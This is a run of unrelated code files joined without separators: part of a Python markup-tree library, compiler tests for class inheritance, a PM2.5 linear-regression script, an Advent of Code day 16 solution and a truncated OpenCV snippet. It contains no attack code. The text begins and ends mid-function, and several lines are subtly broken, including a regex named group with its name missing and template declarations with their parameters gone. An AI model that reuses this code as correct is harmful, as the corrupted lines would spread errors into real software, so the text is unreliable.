found_orig: if pred(c): return (c.subnode(self._parent) if traversable else c) elif c is self._orig: found_orig = True if not found_orig: raise ValueError('node was removed from parent') raise NoMatchError(self, fmt_xml_predicate_args(type_or_tag, cl, text, attrs)) # Text. def summary_texts(self, _needs_space:bool=True) -> Generator[str,None,bool]: for child in self.ch: if isinstance(child, Mu): _needs_space = yield from child.summary_texts(_needs_space=_needs_space) continue for m in html_ws_split_re.finditer(str(child)): if m.lastgroup == 'space': if _needs_space: yield ' ' _needs_space = False else: yield m[0] _needs_space = True return _needs_space def summary_text(self, limit=0) -> str: if not limit: return ''.join(self.summary_texts()) parts:List[str] = [] length = 0 for part in self.summary_texts(): parts.append(part) length += len(part) if length > limit: break return ''.join(parts)[:limit] # Text summary. 
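# --- Illustrative usage sketch, not part of pithy.markup: how the picking/finding API above
# is typically used. pick_all/pick inspect only direct children, find_all/find walk the whole
# subtree, and the singular forms raise NoMatchError / MultipleMatchesError instead of returning None.
def _mu_pick_find_example():  # hypothetical helper for illustration only
    doc = Mu(tag='div', ch=[Mu(tag='p', cl='intro', ch=['hello']), Mu(tag='p', ch=['world'])])
    intro = doc.pick('p', cl='intro')                # exactly one matching direct child
    all_texts = [p.text for p in doc.find_all('p')]  # subtree search -> ['hello', 'world']
    return intro.text, all_texts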
def summarize(self, levels=1, indent=0, all_attrs=True) -> str: nl_indent = '\n' + ' ' * indent return ''.join(self._summarize(levels, nl_indent, all_attrs=all_attrs)) def _summarize(self, levels:int, nl_indent:str, all_attrs:bool) -> Iterator[str]: if levels <= 0: yield str(self) else: subnode = '' if self._orig is None else '$' attr_words = ''.join(xml_attr_summary(k, v, text_limit=32, all_attrs=all_attrs) for k, v in self.attrs.items()) nl_indent1 = nl_indent + ' ' yield f'<{subnode}{self.tag}:{attr_words}' for c in self.ch: yield nl_indent1 if isinstance(c, Mu): yield from c._summarize(levels-1, nl_indent1, all_attrs) else: yield repr(c) yield '>' def discard(self, attr:str) -> None: try: del self.attrs[attr] except KeyError: pass def visit(self, *, pre:MuVisitor=None, post:MuVisitor=None, traversable=False) -> None: if pre is not None: pre(self) modified_children:List[MuChild] = [] first_mod_idx:Optional[int] = None for i, c in enumerate(self.ch): if isinstance(c, Mu): if traversable: c = c.subnode(self) try: c.visit(pre=pre, post=post, traversable=traversable) except DeleteNode: if first_mod_idx is None: first_mod_idx = i continue except FlattenNode: if first_mod_idx is None: first_mod_idx = i modified_children.extend(c.ch) # Insert children in place of `c`. continue if first_mod_idx is not None: modified_children.append(c) if first_mod_idx is not None: self.ch[first_mod_idx:] = modified_children if post is not None: post(self) def iter_visit(self, *, pre:MuIterVisitor=None, post:MuIterVisitor=None, traversable=False) -> Iterator[_T]: if pre is not None: yield from pre(self) for i, c in enumerate(self.ch): if isinstance(c, Mu): if traversable: c = c.subnode(self) yield from c.iter_visit(pre=pre, post=post, traversable=traversable) if post is not None: yield from post(self) # Rendering. def esc_attr_val(self, val:str) -> str: raise NotImplementedError def esc_text(self, text:str) -> str: raise NotImplementedError def fmt_attr_items(self, items:Iterable[Tuple[str,Any]]) -> str: 'Return a string that is either empty or with a leading space, containing all of the formatted items.' parts: List[str] = [] for k, v in items: k = self.replaced_attrs.get(k, k) if v in (None, True, False): v = str(v).lower() elif isinstance(v, Present): if v.is_present: v = '' else: continue parts.append(f' {k}="{self.esc_attr_val(str(v))}"') return ''.join(parts) def render(self, newline=True) -> Iterator[str]: 'Render the tree as a stream of text lines.' yield from self._render() if newline: yield '\n' def _render(self) -> Iterator[str]: 'Recursive helper to `render`.' 
if self.void_tags: self_closing = self.tag in self.void_tags if self_closing and self.ch: raise ValueError(self) else: self_closing = not self.ch attrs_str = self.fmt_attr_items(self.attrs.items()) head_slash = '/' if self_closing else '' yield f'<{self.tag}{attrs_str}{head_slash}>' if self_closing: return yield from self.render_children() yield f'</{self.tag}>' def render_children(self) -> Iterator[str]: child_newlines = ( len(self.ch) > 1 and (self.tag not in self.ws_sensitive_tags) and (self.tag not in self.inline_tags)) def is_block(el:MuChild) -> bool: return isinstance(el, Mu) and (el.tag not in self.inline_tags) if child_newlines: yield '\n' for child, next_child in window_pairs(self.ch): assert isinstance(child, mu_child_classes), child if isinstance(child, str): yield self.esc_text(child) elif isinstance(child, Mu): yield from child._render() elif isinstance(child, EscapedStr): assert isinstance(child.string, str), child.string yield child.string else: raise TypeError(child) # Expected str, EscapedStr, or Mu. if child_newlines and (is_block(child) or next_child is None or is_block(next_child)): yield '\n' def render_str(self, newline=True) -> str: 'Render the tree into a single string.' return ''.join(self.render(newline=newline)) def render_children_str(self, newline=True) -> str: 'Render the children into a single string.' return ''.join(self.render_children()) mu_child_classes = (str, EscapedStr, Mu) def xml_attr_summary(key:str, val:Any, *, text_limit:int, all_attrs:bool) -> str: ks = key if _word_re.fullmatch(key) else repr(key) if all_attrs or key in ('id', 'class'): return f' {ks}={repr_lim(val, text_limit)}' # Show id and class values. return f' {ks}=…' # Omit other attribute values. def xml_child_summary(child:MuChild, text_limit:int) -> str: if isinstance(child, Mu): text = child.summary_text(limit=text_limit) if text: return f' {child.tag}:{repr_lim(text, limit=text_limit)}' return ' ' + child.tag if isinstance(child, EscapedStr): child = child.string text = html_ws_re.sub(newline_or_space_for_ws, child) return ' ' + repr_lim(text, limit=text_limit) def xml_pred(type_or_tag:Union[str,Type[_Mu]]='', *, cl:str='', text:str='', attrs:Dict[str,Any]={}) -> MuPred: 'Update _attrs with items from other arguments, then construct a predicate that tests Mu nodes.' tag_pred:Callable if not type_or_tag: tag_pred = lambda node: True elif isinstance(type_or_tag, type): tag_pred = lambda node: isinstance(node, type_or_tag) # type: ignore else: tag_pred = lambda node: node.tag == type_or_tag def predicate(node:Mu) -> bool: return ( tag_pred(node) and (not cl or cl in node.classes) and all(node.attrs.get(k.replace('_', '-')) == v for k, v in attrs.items()) and (not text or text in node.text)) return predicate def fmt_xml_predicate_args(type_or_tag:Union[Type,str], cl:str, text:str, attrs:Dict[str,str]) -> str: words:List[str] = [] if type_or_tag: words.append(f'`{type_or_tag.__name__}`' if isinstance(type_or_tag, type) else repr(type_or_tag)) if cl: words.append(f'cl={cl!r}') for k, v in attrs.items(): words.append(xml_attr_summary(k, v, text_limit=0, all_attrs=True).lstrip()) if text: words.append(f'…{text!r}…') return ' '.join(words) def newline_or_space_for_ws(match:Match) -> str: return '\n' if '\n' in match[0] else ' ' def html_ws_replacement(m:Match) -> str: return '\n' if '\n' in m[0] else ' ' # HTML defines ASCII whitespace as "U+0009 TAB, U+000A LF, U+000C FF, U+000D CR, or U+0020 SPACE." 
html_ws_re = re.compile(r'[\t\n\f\r ]+') html_ws_split_re = re.compile(r'(?P[\t\n\f\r ])|[^\t\n\f\r ]+') _word_re = re.compile(r'[-\w]+') source/tests/py_tests/inheritance_test.py from py_tests_common import * def InheritanceTest_ClassKindAttribute_Test0(): c_program_text= """ class S final {} """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassKindAttribute_Test1(): c_program_text= """ class S polymorph {} """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassKindAttribute_Test2(): c_program_text= """ class S interface {} """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassKindAttribute_Test3(): c_program_text= """ class S abstract {} """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassKindAttribute_Test4(): c_program_text= """ template class S abstract {} // class kind attribute after template signature parameters """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassParentsList_Test0(): c_program_text= """ class A polymorph{} class C polymorph : A {} // Single parent + kind attribute """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassParentsList_Test1(): c_program_text= """ class A interface{} class B polymorph{} class C final : A, B {} // Multiple parents + kind attribute """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassParentsList_Test2(): c_program_text= """ class A interface{} class B polymorph{} class C : A, B {} // Multiple parents and no kind attribute """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassParentsList_Test3(): c_program_text= """ class A polymorph{} template class C polymorph : A {} // Single parent + kind attribute + template """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassParentsList_Test4(): c_program_text= """ class A interface{} class B polymorph{} template class C final : A, B {} // Multiple parents + kind attribute + template """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassParentsList_Test5(): c_program_text= """ class A interface{} class B polymorph{} template class C : A, B {} // Multiple parents and no kind attribute + template """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassParentsList_Test6(): c_program_text= """ namespace NNN{ class A polymorph{} } class C : NNN::A {} // Single parent inside namespace """ tests_lib.build_program( c_program_text ) def InheritanceTest_ParentClassNameVisibleInChild_Test0(): c_program_text= """ class A polymorph { type I= i32; } class B : A{} fn Foo() : i32 { var B::I r= 5652111; // B::I must be visible return r; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 5652111 ) def InheritanceTest_ChildClassNameOverridesParentClassName_Test0(): c_program_text= """ class A polymorph { type I= f64; } class B : A { type I= i32; } fn Foo() : i32 { var B::I r= 24574; // B::I must be selected, instead of A::I return r; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 24574 ) def InheritanceTest_ChildClassNameOverridesParentClassName_Test1(): c_program_text= """ class A polymorph { type I= f64; } class B : A { fn I() : i32 // Child class have different kind of symbol with same name. 
{ return 4447854; } } fn Foo() : i32 { return B::I(); // Must access function B::I, not type A::I } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 4447854 ) def InheritanceTest_ChildClassNameOverridesParentClassName_Test2(): c_program_text= """ class A polymorph { fn I() : i32 { return 0; } } class B : A { type I= i32; // Child class have different kind of symbol with same name. } fn Foo() : i32 { var B::I r= 658566; // type B::I must be selected, instead of function A::I. return r; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 658566 ) def InheritanceTest_ChildClassNameOverridesParentClassName_Test3(): c_program_text= """ class A polymorph { fn foo() : i32 { return 0; } } class B : A { fn foo() : i32 { return 5584; } // Static function shadows parent class function with exact signature. } fn Foo() : i32 { return B::foo(); // B::foo must be called } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 5584 ) def InheritanceTest_ChildClassNameOverridesParentClassName_Test4(): c_program_text= """ class A polymorph { fn foo( i32 x ) : i32 { return x; } } class B : A { fn foo() : i32 { return 0; } // Function in child class merged with one functions set with parent class functions. } fn Foo() : i32 { return B::foo( 996544 ); // A::foo must be called } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 996544 ) def InheritanceTest_ChildClassNameOverridesParentClassName_Test5(): c_program_text= """ class A polymorph { f32 x; fn constructor() ( x= 0.0f ) {} } class B : A { i32 x; fn constructor() ( x= 0 ) {} } fn Foo() : i32 { var B mut b; b.x= 66541211; // member B::x must be selected return b.x; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 66541211 ) def InheritanceTest_ParentClassFieldAccess_Test0(): c_program_text= """ class A polymorph { i32 a; fn constructor()( a= 541 ){} } class B : A { f32 b; fn constructor()( b= 124.3f ){} } class C : B { f64 c; fn constructor()( c= -54.2 ){} } fn Foo() : i32 { var C c; return i32( f64(c.a) - f64(c.b) / f64(c.c) ); // Access parent fields via .member_access. } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_ParentClassFieldAccess_Test1(): c_program_text= """ class A polymorph { i32 a; fn constructor()( a= 541 ){} } class B : A { f32 b; fn constructor()( b= 124.3f ){} } class C : B { f64 c; fn constructor()( c= -54.2 ){} fn Foo( this ) :i32 { return i32( f64(a) - f64(b) / f64(c) ); // Access parent fields via NamedOperand. } } fn Foo() : i32 { var C c; return c.Foo(); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_ParentClassFieldAccess_Test2(): c_program_text= """ class A polymorph { i32 a; fn constructor()( a= 541 ){} } class B : A { f32 b; fn constructor()( b= 124.3f ){} } class C : B { f64 c; fn constructor()( c= -54.2 ){} fn Foo( this ) :i32 { return i32( f64(A::a) - f64(B::b) / f64(C::c) ); // Access parent fields via complex NamedOperand. 
} } fn Foo() : i32 { var C c; return c.Foo(); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_ParentClassFieldAccess_Test3(): c_program_text= """ class One polymorph { i32 a; fn constructor()( a= 654 ){} } class Two : One { i32 a; fn constructor()( a= 321 ){} } class S : Two { fn GetA( this ) : i32 { return One::a - Two::a; } // Should access fields of defferent classes } fn Foo() : i32 { var S c; return c.GetA(); } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 654 - 321 ) def InheritanceTest_InitializeBaseClass_Test0(): c_program_text= """ class A polymorph { i32 a; fn constructor()( a= 541 ){} } class B : A { f32 b; fn constructor()( b= 124.3f ){} // Must implicitly call A::constructor } fn Foo() { var B b; halt if( b.a != 541 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_InitializeBaseClass_Test1(): c_program_text= """ class A polymorph { i32 a; fn constructor( i32 x )( a= x ){} } class B : A { fn constructor( i32 x )( base(x) ){} // Must explicitly call A::constructor } fn Foo() { var B b( 55521 ); halt if( b.a != 55521 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_InitializeBaseClass_Test2(): c_program_text= """ class A polymorph { i32 a; fn constructor()( a= 988541 ){} } class B : A { // Must generate default constructor, that calls A::constructor } fn Foo() { var B b; halt if( b.a != 988541 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_InitializeBaseClass_Test3(): c_program_text= """ class A polymorph { i32 a; fn constructor( i32 x )( a= x ){} } class B : A { i32 b; fn constructor( i32 x )( base(x), b= a ){} // Must access parent class field after explicit base initialization. } fn Foo() { var B b( 1451 ); halt if( b.a != 1451 ); halt if( b.b != 1451 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_InitializeBaseClass_Test4(): c_program_text= """ class A polymorph { i32 a; fn constructor()( a= 2018 ){} } class B : A { i32 b; fn constructor()( b= a ){} // Must access parent class field after implicit base initialization. } fn Foo() { var B b; halt if( b.a != 2018 ); halt if( b.b != 2018 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_InitializeBaseClass_Test5(): c_program_text= """ class A polymorph { i32 a; fn constructor( i32 x )( a= x ){} } class B : A { i32 b; fn constructor( i32 x )( base(x), b= base.a ){} // Must access "base" after explicit "base" initialization. } fn Foo() { var B b( 77457 ); halt if( b.a != 77457 ); halt if( b.b != 77457 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_InitializeBaseClass_Test6(): c_program_text= """ class A polymorph { i32 a; fn constructor()( a= 66633625 ){} } class B : A { i32 b; fn constructor()( b= base.a ){} // Must access "base" after implicit "base" initialization. 
} fn Foo() { var B b; halt if( b.a != 66633625 ); halt if( b.b != 66633625 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_BaseReference_Test0(): c_program_text= """ class A polymorph { i32 a; fn constructor( i32 in_a )( a= in_a ){} } class B : A { i32 a; fn constructor( i32 in_base_a, i32 in_a )( base(in_base_a), a= in_a ){} fn GetA( this ) : i32 { return a; } fn GeBasetA( this ) : i32 { return base.a; } } fn Foo() { var B b( 584, 99965 ); halt if( b.GetA() != 99965 ); halt if( b.GeBasetA() != 584 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def Desturctors_ForInheritance_Test0(): c_program_text= """ class A polymorph { i32 &mut a; fn constructor( this'x', i32 &'y mut in_a ) ' x <- y' ( a= in_a ){} fn destructor() { a= 0; } } class B : A { fn constructor( this'x', i32 &'y mut in_a ) ' x <- y' ( base(in_a) ){} // Must generate default destructor, which calls base destructor. } fn Foo() { var i32 mut x= 586; { var B b( x ); // Destuctor for 'A' (base of 'B') must be called. } halt if( x != 0 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def Desturctors_ForInheritance_Test1(): c_program_text= """ class A polymorph { i32 &mut a; fn constructor( this'x', i32 &'y mut in_a ) ' x <- y' ( a= in_a ){} fn destructor() { a= 0; } } class B : A { fn constructor( this'x', i32 &'y mut in_a ) ' x <- y' ( base(in_a) ){} fn destructor() { // after end of this destructor, destructor for base must be called. } } fn Foo() { var i32 mut x= 847; { var B b( x ); } halt if( x != 0 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def ChildToParentReferenceCast_Test0(): c_program_text= """ class A polymorph{} class B : A {} fn Bar( A& a ) {} fn Foo() { var B b; Bar(b); // Must convert B& to A&. Direct child to parent conversion. } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def ChildToParentReferenceCast_Test1(): c_program_text= """ class A polymorph{} class AA interface{} class B : A, AA {} fn Bar( A& a ) {} fn Baz( AA& aa ) {} fn Foo() { var B b; // Direct child to parent conversion for class with two parents. Bar(b); // Must convert B& to A&. Baz(b); // Must convert B& to AA&. } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def ChildToParentReferenceCast_Test2(): c_program_text= """ class A polymorph{} class B : A {} class C : B {} fn Bar( A& a ) {} fn Foo() { var C c; // Undirect child to parent conversion. Bar(c); // Must convert B& to A&. } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def ChildToParentReferenceCast_Test3(): c_program_text= """ class A0 interface{} class A1 interface{} class A interface : A0, A1 {} class B0 interface{} class B1 interface{} class B interface : B0, B1 {} class C : A, B {} fn BarA0( A0& a0 ) {} fn BarA1( A1& a1 ) {} fn BarB0( B0& b0 ) {} fn BarB1( B1& b1 ) {} fn BarA ( A & a ) {} fn BarB ( B & b ) {} fn BarC ( C & c ) {} fn Foo() { var C c; // Undirect child to parent conversion for class with multiple parents. 
BarA0(c); BarA1(c); BarB0(c); BarB1(c); BarA (c); BarB (c); BarC (c); } """ tests_lib.build_program( c_program_text, ) tests_lib.run_function( "_Z3Foov" ) def CopyChildToParent_Test0(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} fn constructor( A &imut other )= default; } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} } fn Foo() : i32 { var B b( 5635224 ); var A a= b; // Copy via expression initializer. return a.x; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 5635224 ) def CopyChildToParent_Test1(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} fn constructor( A &imut other )= default; } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} } fn Foo() : i32 { var B b( 11241 ); var A a(b); // Copy via copy constructor call with reference cast. return a.x; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 11241 ) def CopyChildToParent_Test2(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} op=( mut this, A &imut other )= default; } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} } fn Foo() : i32 { var A mut a( 0 ); var B b( 66685 ); a= b; // Call copy-assignnment return a.x; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 66685 ) def CopyChildToParent_Test3(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} fn constructor( A &imut other )= default; } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} } fn Bar( A a ) : i32 { return a.x; } fn Foo() : i32 { var B b( 44758 ); return Bar(b); // Copy in function call } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 44758 ) def MoveClassWithParent_Test0(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} } fn Bar( B b ) : i32 { return b.x; } fn Foo() : i32 { return Bar( B( 58 ) ); // Move in function call } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 58 ) def MoveClassWithParent_Test1(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} } fn Foo() : i32 { auto b= B( 66584 ); // Move in aut-variable initialization return b.x; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 66584 ) def MoveClassWithParent_Test2(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} } fn Foo() : i32 { var B b= B( 965856 ); // Move in variable initialization return b.x; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 965856 ) def MoveClassWithParent_Test3(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} } fn Foo() : i32 { var B mut b(0); b= B( 11125 ); // Move in assignment return b.x; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( 
"_Z3Foov" ) assert( call_result == 11125 ) def GeneratedCopyConstructor_Test0(): c_program_text= """ class A polymorph { i32 x; fn constructor( i32 in_x ) ( x= in_x ) {} fn constructor( A &imut other )= default; } class B : A { fn constructor( i32 in_x ) ( base(in_x) ) {} fn constructor( B &imut other )= default; } fn Foo() : i32 { var B b( 99965 ); var B b2= b; halt if( b.x != b2.x ); return b2.x; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 99965 ) def AbstractClassConstructor_Test0(): c_program_text= """ class A abstract { fn Foo( this ){} fn constructor() { Foo(); // "this" unavailable in constructor of abstrat class, so, we can not here call "thiscall" function. } } """ errors_list= ConvertErrors( tests_lib.build_program_with_errors( c_program_text ) ) assert( len(errors_list) > 0 ) assert( errors_list[0].error_code == "CouldNotSelectOverloadedFunction" ) assert( errors_list[0].src_loc.line == 7 ) def AbstractClassConstructor_Test1(): c_program_text= """ class A; class A abstract { fn constructor() { this; // "this" unavailable in constructor of abstrat class. } } """ errors_list= ConvertErrors( tests_lib.build_program_with_errors( c_program_text ) ) assert( len(errors_list) > 0 ) assert( errors_list[0].error_code == "ThisUnavailable" ) assert( errors_list[0].src_loc.line == 7 ) def AbstractClassConstructor_Test2(): c_program_text= """ class A abstract { i32 x; fn constructor() ( x= 0 ) { x= 42; // Ok, can directly access fields. } } """ tests_lib.build_program( c_program_text ) def AbstractClassDestructor_Test0(): c_program_text= """ class A; class A abstract { fn destructor() { this; // "this" unavailable in destructor of abstract class. } } """ errors_list= ConvertErrors( tests_lib.build_program_with_errors( c_program_text ) ) assert( len(errors_list) > 0 ) assert( errors_list[0].error_code == "ThisUnavailable" ) assert( errors_list[0].src_loc.line == 7 ) def AbstractClassDestructor_Test1(): c_program_text= """ class A; class A interface { fn destructor() { this; // "this" unavailable in destructor of interface. } } """ errors_list= ConvertErrors( tests_lib.build_program_with_errors( c_program_text ) ) assert( len(errors_list) > 0 ) assert( errors_list[0].error_code == "ThisUnavailable" ) assert( errors_list[0].src_loc.line == 7 ) def AbstractClassDestructor_Test2(): c_program_text= """ class A; fn Foo( A& a ){} class A abstract { i32 x; fn constructor()( x= 0 ){} fn destructor() { x= 42; // Ok, can directly access fields. 
} } """ tests_lib.build_program( c_program_text ) #M=2 import numpy as np import matplotlib.pyplot as plt import math import random #data preprocesing: #feature data dataX=np.genfromtxt("dataset_X.csv",delimiter=',') dataX=np.delete(dataX,[0],axis=1) #target data dataT=np.genfromtxt("dataset_T.csv",delimiter=',') dataT=np.delete(dataT,[0],axis=1) #shuffle the data to avoid the strange distribution #concatenate the feature and target matrix and shuffle together def shuffle(dataX,dataT): data_temp=np.c_[dataT,dataX] np.random.shuffle(data_temp) dataT=data_temp[:,0] dataX=np.delete(data_temp,[0],axis=1) return dataX,dataT def normalization(dataX,dataT): #features mean_X=[] std_X=[] for i in range(0,17): mean_X.append(np.mean(dataX[:,i])) std_X.append(np.std(dataX[:,i])) dataX_n=np.zeros(np.shape(dataX)) for i in range(0,len(dataX)): for j in range(0,17): dataX_n[i,j]=(dataX[i,j]-mean_X[j])/std_X[j] dataX=dataX_n #target mean_T=np.mean(dataT[:]) std_T=np.std(dataT[:]) dataT_n=np.zeros(np.shape(dataT)) for i in range(0,len(dataT)): dataT_n[i]=(dataT[i]-mean_T)/std_T return dataX,dataT # append the dataX to match the theta (171 features) def data_preprocessing(dataX): k=18 for i in range(1,18): for j in range(1,i+1): if k in range(18,171): dataX=np.insert(dataX,k,values=dataX[:,i]*dataX[:,j],axis=1) k+=1 return dataX #split the data into training set and the testing set def train_test_split(X,Y,test_size): X_train=np.array(X[:math.floor(len(X)*(1-test_size))]) Y_train=np.array(Y[:math.floor(len(Y)*(1-test_size))]) X_test=np.array(X[math.floor(len(X)*(1-test_size)):]) Y_test=np.array(Y[math.floor(len(Y)*(1-test_size)):]) Y_train=Y_train.reshape(1,len(Y_train)) Y_test=Y_test.reshape(1,len(Y_test)) return X_train, X_test, Y_train, Y_test #hypothesis function def hypothesis(theta,X): return np.matmul(theta,np.transpose(X)) #gradient descent def gradient_descent(theta,X,T,learning_rate,iteration): N=len(X) cost_function=[] for i in range(1,iteration+1): cost_function.append(np.sum((hypothesis(theta,X)-T)**2)/len(X)/2) theta_grad=(1/N)*np.matmul((hypothesis(theta,X)-T),(X)) theta-=learning_rate*theta_grad return theta,cost_function #root mean square error def rmse(a,b): return math.sqrt(np.sum((a-b)**2)/len(a)) #parameter: learning_rate=0.01 iteration=10000 theta=np.zeros((1,171)) dataX,dataT=normalization(dataX,dataT) dataX,dataT=shuffle(dataX,dataT) temp=np.array([1]*len(dataX)) dataX=np.c_[temp,dataX] # append the dataX to match the theta (171 features) dataX=data_preprocessing(dataX) X_train,X_test,T_train,T_test = train_test_split(dataX,dataT, test_size = 0.2) theta,cost_function=gradient_descent(theta,X_train,T_train,learning_rate,iteration) #plot the cost function versus iteration times x=np.arange(0,len(cost_function)) plt.plot(x,cost_function,'b.') plt.title("cost function versus iteration times") plt.xlabel("iteration times") plt.ylabel("cost function") plt.show() #plot the value of the model predict and the actual model (train part) x=np.arange(0,len(X_train)) y=hypothesis(theta,X_train).reshape(len(X_train),) T_train=T_train.reshape(len(X_train),) plt.plot(x,y,color='red',lw=1.0,ls='-',label="training_predict_value") plt.plot(x,T_train,color='blue',lw=1.0,ls='-',label="target_value") plt.text(0,1,"RMSE=%.3lf" %(rmse(T_train,y))) plt.xlabel("the nth data") plt.ylabel("PM2.5") plt.title("Linear regression (M=2) training") plt.legend() plt.show() #plot the value of the model predict and the actual model (test part) x=np.arange(0,len(X_test)) y=hypothesis(theta,X_test).reshape(len(X_test),) 
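
# Aside (illustrative sketch, not part of the original script): the gradient-descent fit above can be
# sanity-checked against the closed-form least-squares solution for the same design matrix.
# This reuses X_train, T_train, hypothesis and rmse defined earlier; np.linalg.lstsq solves
# X_train @ w ~= T_train directly.
theta_closed_form = np.linalg.lstsq(X_train, T_train, rcond=None)[0] # shape (171,)
print("closed-form train RMSE:     ", rmse(T_train, hypothesis(theta_closed_form, X_train)))
print("gradient-descent train RMSE:", rmse(T_train, hypothesis(theta, X_train).reshape(-1)))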
T_test=T_test.reshape(len(X_test),) plt.plot(x,y,color='red',lw=1.0,ls='-',label="testing_predict_value") plt.plot(x,T_test,color='blue',lw=1.0,ls='-',label="target_value") plt.text(0,1,"RMSE=%.3lf" %(rmse(T_test,y))) plt.xlabel("the nth data") plt.ylabel("PM2.5") plt.title("Linear regression (M=2) testing") plt.legend() plt.show()#!/usr/bin/env python # encoding: utf-8 """ Advent of Code 2019 - Day 16 - Challenge 1 https://adventofcode.com/2019/day/16 Solution: 19944447 PEP 8 compliant """ __author__ = "" __email__ = "" def precalculate_pattern(n_data, pattern): full_pattern = [] P = len(pattern) for k in range(n_data): # output digit index pattern_line = [] for ix in range(n_data): # input digit index ip = ((ix+1) // (k+1)) % P # creates proper patter for the digit pattern_line.append(pattern[ip]) full_pattern.append(pattern_line) return full_pattern def fft_phase(data, full_pattern): output = [] N = len(data) for k in range(N): # output digit index # |sum data[i]*pattern[i]| % 10 output.append( abs(sum(x*y for (x, y) in zip(data, full_pattern[k]))) % 10) return output def main(n_phases=100): data = [] with open('inputs/day_16_input.txt') as file: for digit in file.read(): data.append(int(digit)) full_pattern = precalculate_pattern(len(data), [0, 1, 0, -1]) for _ in range(n_phases): data = fft_phase(data, full_pattern) datastring = ''.join(str(x) for x in data[:8]) print("\nPattern after {0} FFT phases: {1}...\n" .format(n_phases, datastring)) return int(datastring) if __name__ == "__main__": main() from .connect import Connect from .model_manage import ModelManage from .engine import Engine import sys if sys.version_info < (3, 0): reload(sys) # noqa: F821 sys.setdefaultencoding("utf-8") chakrank/FFL_10 # -*- coding: utf-8 -*- """ Created on Thu Mar 22 12:17:27 2018 Enviroment test To verify which packages are present @author: chakrank """ import cv2 import matplotlib.image as mpimg import numpy as np def gray(image): gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY) # Define a kernel size and apply Gaussian smoothing kernel_size = 3 #5 or 9 